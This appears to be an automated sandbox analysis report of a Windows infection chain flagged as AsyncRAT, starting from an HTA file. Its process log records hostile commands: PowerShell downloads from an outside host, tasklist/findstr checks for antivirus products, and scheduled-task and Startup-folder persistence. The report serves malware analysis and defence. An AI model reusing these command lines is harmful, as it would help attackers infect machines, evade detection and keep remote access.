Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF9C80	32_2_00BF9C80
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C123F5	32_2_00C123F5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C78400	32_2_00C78400
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C26502	32_2_00C26502
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BFE6F0	32_2_00BFE6F0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C2265E	32_2_00C2265E
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1282A	32_2_00C1282A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C289BF	32_2_00C289BF
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C26A74	32_2_00C26A74
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C70A3A	32_2_00C70A3A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C00BE0	32_2_00C00BE0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C4EDB2	32_2_00C4EDB2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1CD51	32_2_00C1CD51
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C70EB7	32_2_00C70EB7
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C58E44	32_2_00C58E44
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C26FE6	32_2_00C26FE6
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C133B7	32_2_00C133B7
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C0D45D	32_2_00C0D45D
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1F409	32_2_00C1F409
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BFF6A0	32_2_00BFF6A0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C116B4	32_2_00C116B4
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00BF1663	32_2_00BF1663
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C0F628	32_2_00C0F628
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C178C3	32_2_00C178C3
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1DBA5	32_2_00C1DBA5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C11BA8	32_2_00C11BA8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C29CE5	32_2_00C29CE5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C0DD28	32_2_00C0DD28
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C11FC0	32_2_00C11FC0
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C1BFD6	32_2_00C1BFD6
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F5B020	40_2_00F5B020
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F594E0	40_2_00F594E0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F59C80	40_2_00F59C80
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F723F5	40_2_00F723F5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FD8400	40_2_00FD8400
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F86502	40_2_00F86502
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F5E6F0	40_2_00F5E6F0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F8265E	40_2_00F8265E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7282A	40_2_00F7282A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F889BF	40_2_00F889BF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F86A74	40_2_00F86A74
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FD0A3A	40_2_00FD0A3A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F60BE0	40_2_00F60BE0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FAEDB2	40_2_00FAEDB2
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7CD51	40_2_00F7CD51
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FD0EB7	40_2_00FD0EB7
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FB8E44	40_2_00FB8E44
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F86FE6	40_2_00F86FE6
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F733B7	40_2_00F733B7
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F6D45D	40_2_00F6D45D
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7F409	40_2_00F7F409
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F716B4	40_2_00F716B4
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F5F6A0	40_2_00F5F6A0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F51663	40_2_00F51663
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F6F628	40_2_00F6F628
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F778C3	40_2_00F778C3
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7DBA5	40_2_00F7DBA5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F71BA8	40_2_00F71BA8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F89CE5	40_2_00F89CE5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F6DD28	40_2_00F6DD28
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F7BFD6	40_2_00F7BFD6
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00F71FC0	40_2_00F71FC0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00ECB020	42_2_00ECB020
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EC94E0	42_2_00EC94E0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EC9C80	42_2_00EC9C80
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE23F5	42_2_00EE23F5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F48400	42_2_00F48400
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EF6502	42_2_00EF6502
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00ECE6F0	42_2_00ECE6F0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EF265E	42_2_00EF265E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE282A	42_2_00EE282A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EF89BF	42_2_00EF89BF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EF6A74	42_2_00EF6A74
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F40A3A	42_2_00F40A3A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00ED0BE0	42_2_00ED0BE0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F1EDB2	42_2_00F1EDB2
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EECD51	42_2_00EECD51
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F40EB7	42_2_00F40EB7
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F28E44	42_2_00F28E44
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EF6FE6	42_2_00EF6FE6
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE33B7	42_2_00EE33B7
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EDD45D	42_2_00EDD45D
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEF409	42_2_00EEF409
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00ECF6A0	42_2_00ECF6A0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE16B4	42_2_00EE16B4
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EC1663	42_2_00EC1663
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EDF628	42_2_00EDF628
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE78C3	42_2_00EE78C3
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE1BA8	42_2_00EE1BA8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEDBA5	42_2_00EEDBA5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EF9CE5	42_2_00EF9CE5
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EDDD28	42_2_00EDDD28
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EE1FC0	42_2_00EE1FC0
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00EEBFD6	42_2_00EEBFD6

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\220239\Carter.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: String function: 00C10D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: String function: 00C01A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: String function: 00C18B30 appears 42 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00EE8B30 appears 42 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00F70D17 appears 70 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00F61A36 appears 34 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00EE0D17 appears 70 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00F78B30 appears 42 times
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: String function: 00ED1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: String function: 004062A3 appears 58 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: 32.3.Carter.pif.3db2268.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 32.3.Carter.pif.3e14c38.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 44.2.RegAsm.exe.9e0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 32.3.Carter.pif.3db2268.1.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, JbeTyT6ozehDZJ.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, JbeTyT6ozehDZJ.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.expl.evad.winHTA@76/83@4/2

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C5A6AD GetLastError,FormatMessageW,

32_2_00C5A6AD

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C48DE9 AdjustTokenPrivileges,CloseHandle,	32_2_00C48DE9
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 32_2_00C49399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	32_2_00C49399
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FA8DE9 AdjustTokenPrivileges,CloseHandle,	40_2_00FA8DE9
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 40_2_00FA9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	40_2_00FA9399
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F18DE9 AdjustTokenPrivileges,CloseHandle,	42_2_00F18DE9
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 42_2_00F19399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	42_2_00F19399

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

22_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C54148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

32_2_00C54148

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 22_2_004024FB CoCreateInstance,

22_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 32_2_00C5443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

32_2_00C5443D

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bo[1].js

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\R2fsONidW19SbcLy
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8276:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Temp\temp.js

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1664,i,11365846873852603877,16222139913176040509,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe "C:\Users\user\AppData\Local\Temp\msword\msword.exe"
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
